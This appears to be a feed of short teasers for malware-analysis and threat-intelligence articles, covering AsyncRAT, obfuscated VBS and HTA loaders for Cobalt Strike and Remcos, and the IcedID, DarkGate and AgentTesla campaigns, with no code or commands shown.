The login page for the criminal reshipping service SWAT USA Drop.
One of the largest cybercrime services for laundering stolen merchandise was hacked recently, exposing its internal operations, finances and organizational structure. Here’s a closer look at the Russia-based SWAT USA Drop Service, which currently employs more than 1,200 people across the United States who are knowingly or unwittingly involved in reshipping expensive consumer goods purchased with stolen credit cards.…
Authored by Lakshya Mathur & Vignesh Dhatchanamoorthy
AsyncRAT, short for “Asynchronous Remote Access Trojan,” is a sophisticated piece of malware designed to compromise the security of computer systems and steal sensitive information. What sets AsyncRAT apart from other malware strains is its stealthy nature, making it a formidable adversary in the world of cybersecurity.…
Unpacking malware can be a tedious task. Often involving intensive static analysis and in-depth knowledge of debugging.
In this post, I’ll demonstrate an easy method that can be used to unpack files that ultimately load a .NET based malware.
This method primarily involves running the file and monitoring for process executions using Process Hacker.…
In this post, we’ll demonstrate a process for decoding a visual basic (.vbs) script, which contains an encoded Powershell Script used to download Remcos malware from a Google Drive.
We’ll manually analyse and deobfuscate both the vbs and powershell, and develop a decoder to obtain IOCs and decoded values.…
Coming from the newspaper and media industry, I’m no stranger to wanting to write catchy headlines. I’m certainly at fault for throwing together a story about so-and-sos house sold for X million dollars.
But recently I’ve been wondering if those “big numbers” for cybersecurity are helpful at all, even though they might generate clicks to a news organization. …
Intermediate
Improving Malware Analysis Workflows by Modifying the default Ghidra UI.
MatthewOct 25, 2023 — 4 min read
The Ghidra User interface can be intimidating and complicated for users who are not familiar with the tool.
In this post, I’ll go over some changes that I made in order to improve the usability of Ghidra and ensure a better analysis experience.…
Proofpoint researchers identified TA571 delivering the Forked variant of IcedID in two campaigns on 11 and 18 October 2023. Both campaigns included over 6,000 messages, each impacting over 1,200 customers in a variety of industries globally.
Emails in the campaigns purported to be replies to existing threads.…
Most, if not all malvertising incidents result from a threat actor either injecting code within an existing ad, or intentionally creating one. Today, we look at a different scenario where, as strange as that may sound, malvertising was entirely accidental.
The reason this happened was due to the combination of two separate factors: a compromised website and Google Dynamic Search Ads.…
Demonstrating how to manually decode a complex .vbs script used to load Cobalt Strike shellcode into memory.
The referenced script implements heavy text-based obfuscation. We can defeat this obfuscation by utilising CyberChef and Regex.
Post obfuscation, we will identify some “malformed” shellcode which we will manually fix, before emulating with the SpeakEasy emulator.…
In this post. we will demonstrate a process for decoding a simple .hta loader used to load cobalt strike shellcode. We will perform initial analysis using a text editor, and use CyberChef to extract embedded shellcode. From here we will validate the shellcode using an emulator (SpeakEasy) and perform some basic analysis using Ghidra.…
In this post. I will demonstrate a process for decoding a simple .hta loader used to load cobalt strike shellcode. We will perform initial analysis using a text editor, and use CyberChef to extract embedded shellcode. From here we will validate the shellcode using an emulator (SpeakEasy) and perform some basic analysis using Ghidra.…
Threat actors focus on gaining remote access and control of victims’ devices. For this they either use fake apps or masquerade as legitimate apps. This blog is about the Rusty Droid RAT, which masquerades Chrome browser for Android. The sample under consideration is taken from this tweet.…
The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Backdoors, Blockchain, Botnets, Hexadecimal IP notation, Infostealers, and Ransomware. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure…
We detail an ongoing campaign abusing messaging platforms Skype and Teams to distribute the DarkGate malware to targeted organizations. We also discovered that once DarkGate is installed on the victim’s system, additional payloads were introduced to the environment.
From July to September, we observed the DarkGate campaign (detected by Trend Micro as TrojanSpy.AutoIt.DARKGATE.AA)…
AhnLab Security Emergency response Center (ASEC) spotted the AgentTesla Infostealer being distributed through an email in the form of a malicious BAT file. When the BAT file is executed, it employs the fileless method to run AgentTesla (EXE) without creating the file on the user’s PC.…